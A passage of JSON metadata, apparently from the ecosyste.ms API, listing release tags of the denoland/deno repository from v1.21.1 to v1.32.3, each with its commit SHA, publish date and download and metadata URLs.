api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.